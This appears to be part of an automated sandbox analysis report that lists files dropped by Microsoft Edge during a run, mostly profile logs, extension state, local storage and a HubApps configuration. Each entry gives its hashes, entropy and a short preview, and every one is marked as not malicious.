                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                          Entropy (8bit):5.181817328540608
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvFVdMM+q2PCHhJ23oH+Tcwt8aPrqIFUtJvFOvZmwPvFOiMVkwOCHhJ23oH+Ts:7pN+vBYebL3FUtqv/0vV56YebQJ
                                                                                                                                                                                                                                                                          MD5:EDD7865665052A576AEDC66C13430294
                                                                                                                                                                                                                                                                          SHA1:9EF126B1CAB566AFA078C5F1C1A5CD2E065F01B6
                                                                                                                                                                                                                                                                          SHA-256:946A40790EA50831489CE08361929DD78D284FA0290DBC6D9601D005C869C9A1
                                                                                                                                                                                                                                                                          SHA-512:1D1C0C5F96E594B6EBA573788288326C510D6692570C5B5EEC6CE3F338FDB59FF952EA2A6E861E25D9714E4A81A98FD4FA2A64DD9FF8B1845BABA995FFBDDB34
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.665 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:55:35.666 eac Recovering log #3.2025/01/09-08:55:35.666 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                          Entropy (8bit):5.181817328540608
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvFVdMM+q2PCHhJ23oH+Tcwt8aPrqIFUtJvFOvZmwPvFOiMVkwOCHhJ23oH+Ts:7pN+vBYebL3FUtqv/0vV56YebQJ
                                                                                                                                                                                                                                                                          MD5:EDD7865665052A576AEDC66C13430294
                                                                                                                                                                                                                                                                          SHA1:9EF126B1CAB566AFA078C5F1C1A5CD2E065F01B6
                                                                                                                                                                                                                                                                          SHA-256:946A40790EA50831489CE08361929DD78D284FA0290DBC6D9601D005C869C9A1
                                                                                                                                                                                                                                                                          SHA-512:1D1C0C5F96E594B6EBA573788288326C510D6692570C5B5EEC6CE3F338FDB59FF952EA2A6E861E25D9714E4A81A98FD4FA2A64DD9FF8B1845BABA995FFBDDB34
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.665 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:55:35.666 eac Recovering log #3.2025/01/09-08:55:35.666 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.211922674936253
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvFEpM+q2PCHhJ23oH+Tcwt865IFUtJvFCJZmwPvFCcMVkwOCHhJ23oH+TcwtD:79+vBYeb/WFUtQ/qV56Yeb/+SJ
                                                                                                                                                                                                                                                                          MD5:6A928A881CF652340B490F3F9D0D54A9
                                                                                                                                                                                                                                                                          SHA1:18C4F89450C158143B0B6DFDE0B3B6CF1C3A2D2C
                                                                                                                                                                                                                                                                          SHA-256:70B7E9675942D1B310CFC55B688F8BD7C59AE4A906DE12D2452219CA09AD3934
                                                                                                                                                                                                                                                                          SHA-512:ADE04CF62F249F765BB0D8FAE3889B4E927BF331D0EDF2CB94B7770F68AD40821A8889013E36E14C30E5AFAD07776023E3758369387EBC8F27E1B57BE4F7E965
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.667 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:55:35.668 eac Recovering log #3.2025/01/09-08:55:35.668 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.211922674936253
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvFEpM+q2PCHhJ23oH+Tcwt865IFUtJvFCJZmwPvFCcMVkwOCHhJ23oH+TcwtD:79+vBYeb/WFUtQ/qV56Yeb/+SJ
                                                                                                                                                                                                                                                                          MD5:6A928A881CF652340B490F3F9D0D54A9
                                                                                                                                                                                                                                                                          SHA1:18C4F89450C158143B0B6DFDE0B3B6CF1C3A2D2C
                                                                                                                                                                                                                                                                          SHA-256:70B7E9675942D1B310CFC55B688F8BD7C59AE4A906DE12D2452219CA09AD3934
                                                                                                                                                                                                                                                                          SHA-512:ADE04CF62F249F765BB0D8FAE3889B4E927BF331D0EDF2CB94B7770F68AD40821A8889013E36E14C30E5AFAD07776023E3758369387EBC8F27E1B57BE4F7E965
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.667 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:55:35.668 eac Recovering log #3.2025/01/09-08:55:35.668 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.243489470495695
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv424q2PCHhJ23oH+Tcwt8NIFUtJv46ZZmwPv4gFkwOCHhJ23oH+Tcwt8+eLJ:7sxvBYebpFUtq6Z/YgF56YebqJ
                                                                                                                                                                                                                                                                          MD5:18BFADBF50BE5F177CF2D1F3DD68E433
                                                                                                                                                                                                                                                                          SHA1:1344FCF278734A8EEE85B6C9DE14EB917B08D978
                                                                                                                                                                                                                                                                          SHA-256:CFEDB9DDF4C8F243442A5861A54F11D03A7FF00BB73E96DD897AA28EB0889C51
                                                                                                                                                                                                                                                                          SHA-512:8F849A27D073B1ADEE7F98BB37E7038C28F7AC65556ADC5D60E834D02CE07293F0ABD2B08AD45B2D7E69498E3932BF3321EECFA6439493A3464629E25A9BDEE1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.483 1ad4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:55:36.517 1ad4 Recovering log #3.2025/01/09-08:55:36.524 1ad4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.243489470495695
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv424q2PCHhJ23oH+Tcwt8NIFUtJv46ZZmwPv4gFkwOCHhJ23oH+Tcwt8+eLJ:7sxvBYebpFUtq6Z/YgF56YebqJ
                                                                                                                                                                                                                                                                          MD5:18BFADBF50BE5F177CF2D1F3DD68E433
                                                                                                                                                                                                                                                                          SHA1:1344FCF278734A8EEE85B6C9DE14EB917B08D978
                                                                                                                                                                                                                                                                          SHA-256:CFEDB9DDF4C8F243442A5861A54F11D03A7FF00BB73E96DD897AA28EB0889C51
                                                                                                                                                                                                                                                                          SHA-512:8F849A27D073B1ADEE7F98BB37E7038C28F7AC65556ADC5D60E834D02CE07293F0ABD2B08AD45B2D7E69498E3932BF3321EECFA6439493A3464629E25A9BDEE1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.483 1ad4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:55:36.517 1ad4 Recovering log #3.2025/01/09-08:55:36.524 1ad4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                          Entropy (8bit):0.21880421027789762
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:b+vtFlljq7A/mhWJFuQ3yy7IOWUL5294dweytllrE9SFcTp4AGbNCV9RUIQYn:X75fOnrd0Xi99pEYl
                                                                                                                                                                                                                                                                          MD5:06B4876E88377570927F1852E7540E51
                                                                                                                                                                                                                                                                          SHA1:C1F1898A5432EFAB99E55C0E68E160BB9E31688A
                                                                                                                                                                                                                                                                          SHA-256:9F8498C3D4F3F2B14B032C3584A3160BB7F30BA9E20B6DEB1775146DA50172E4
                                                                                                                                                                                                                                                                          SHA-512:D4A2635C7C5BBA753ADFAA96CFD0A9824B9BE09FA4167EB1D66DBB56E572B05EDF2E97AC920E2E2ED3076BC91F2D045DAD7D408CC0072B3AEDC89F8300E3422B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..................&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                          Entropy (8bit):3.647718136575781
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:aj9P0lP/Kbt3QkQerC773pLDc7gam6IChXjl4RKToaAu:adSP/qe2C7OaSpl4RKcC
                                                                                                                                                                                                                                                                          MD5:0D4F2B61CE4979DECDC4A83722D158FD
                                                                                                                                                                                                                                                                          SHA1:92F5C5F715706998192409E942A22511904F8390
                                                                                                                                                                                                                                                                          SHA-256:4ED505DA9C305FA33D1FB0B963A31B0D34B7EB7D8FE6ACF5A7D9DAAA9FF0977F
                                                                                                                                                                                                                                                                          SHA-512:7731F6876360A251896FA8EBB3DC29E6D24A6845344728B1AF665F21CEB1A6D5EAB8A5220453119F0D2810FB3236ADB4F9C6EBBF944B39F653AB9927BBA0FC39
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):405
                                                                                                                                                                                                                                                                          Entropy (8bit):5.307348753253169
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:7mvBYeb8rcHEZrELFUt1/I56Yeb8rcHEZrEZSJ:7kBYeb8nZrExgE6Yeb8nZrEZe
                                                                                                                                                                                                                                                                          MD5:0E7C614057F0745042AD784E04EF7A9A
                                                                                                                                                                                                                                                                          SHA1:8D8155674E8675A1F0607A3C1DE7852BF22E70DE
                                                                                                                                                                                                                                                                          SHA-256:90391BE8FCBF44C7CCF4DDC4655C2676E719114FBBD31318137C6AB290E9579D
                                                                                                                                                                                                                                                                          SHA-512:C58CDAE0547B8876CBE550B39520EE1BC985B4492DBD5D5C85D0220C35738471C275CB2E13B94102093964A1B6B2148E5DAE87D9A2CF4DEDEE951688299A6BB3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:41.781 eb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:55:41.781 eb8 Recovering log #3.2025/01/09-08:55:41.782 eb8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):405
                                                                                                                                                                                                                                                                          Entropy (8bit):5.307348753253169
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:7mvBYeb8rcHEZrELFUt1/I56Yeb8rcHEZrEZSJ:7kBYeb8nZrExgE6Yeb8nZrEZe
                                                                                                                                                                                                                                                                          MD5:0E7C614057F0745042AD784E04EF7A9A
                                                                                                                                                                                                                                                                          SHA1:8D8155674E8675A1F0607A3C1DE7852BF22E70DE
                                                                                                                                                                                                                                                                          SHA-256:90391BE8FCBF44C7CCF4DDC4655C2676E719114FBBD31318137C6AB290E9579D
                                                                                                                                                                                                                                                                          SHA-512:C58CDAE0547B8876CBE550B39520EE1BC985B4492DBD5D5C85D0220C35738471C275CB2E13B94102093964A1B6B2148E5DAE87D9A2CF4DEDEE951688299A6BB3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:41.781 eb8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:55:41.781 eb8 Recovering log #3.2025/01/09-08:55:41.782 eb8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1598
                                                                                                                                                                                                                                                                          Entropy (8bit):5.588380738886849
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:gZGJkH7VXZ7RV03Sx497AHHk2GJ348ylsKyG:gw6bh5BZdP8osM
                                                                                                                                                                                                                                                                          MD5:6664ABDED88684DEFA57DEFFDFA30A7E
                                                                                                                                                                                                                                                                          SHA1:56AD305450D41662054042A5A29322B76E841D38
                                                                                                                                                                                                                                                                          SHA-256:02594001070B0D4CEE7132C8F4D907C6D378087F3E8FC88219341243FF3C6A35
                                                                                                                                                                                                                                                                          SHA-512:AC3DFE7ECAD6D647487E7E5B4BF946FE3271A048A206B5D8733E9B691D9A02D10DA96AEC838BCD9F4624046931FC8ED71CC763DB2909F79C4CF855441731D3D4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...7................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":919}.!_https://ntp.msn.com..LastKnownPV..1736430943889.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736430945371.._https://ntp.msn.com..MUID!.0196AA9642C66D0E1944BFF943A46C22.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736430943957,"schedule":[-1,4,33,9,-1,-1,-1],"scheduleFixed":[-1,4,33,9,-1,-1,-1],"simpleSchedule":[11,26,51,52,15,31,17]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736430943859.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250109.199"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https:/

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                          Entropy (8bit):5.189925139138666
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4Rr+q2PCHhJ23oH+Tcwt8a2jMGIFUtJv4MZZmwPv4ENVkwOCHhJ23oH+Tcw2:7sRSvBYeb8EFUtqg/YEz56Yeb8bJ
                                                                                                                                                                                                                                                                          MD5:0A65F0C6E7367199498C5838253E5FDF
                                                                                                                                                                                                                                                                          SHA1:F1ADC62B32A3C217174C18711CCA8ECAD1F86410
                                                                                                                                                                                                                                                                          SHA-256:DDA8FB756C077571BEDBFF05D2D42FA24B539096302E3070CE0EE16928BEE628
                                                                                                                                                                                                                                                                          SHA-512:04B601A50E094814F3D776A5623E7C70E9F5A2C54DB52F12FA58B7064199BAB8BF7A29A3935CA2C06ACD57F25767F0B4D0EFF4EB830D23578ABC1E686600C619
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.277 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:55:36.278 1a08 Recovering log #3.2025/01/09-08:55:36.281 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

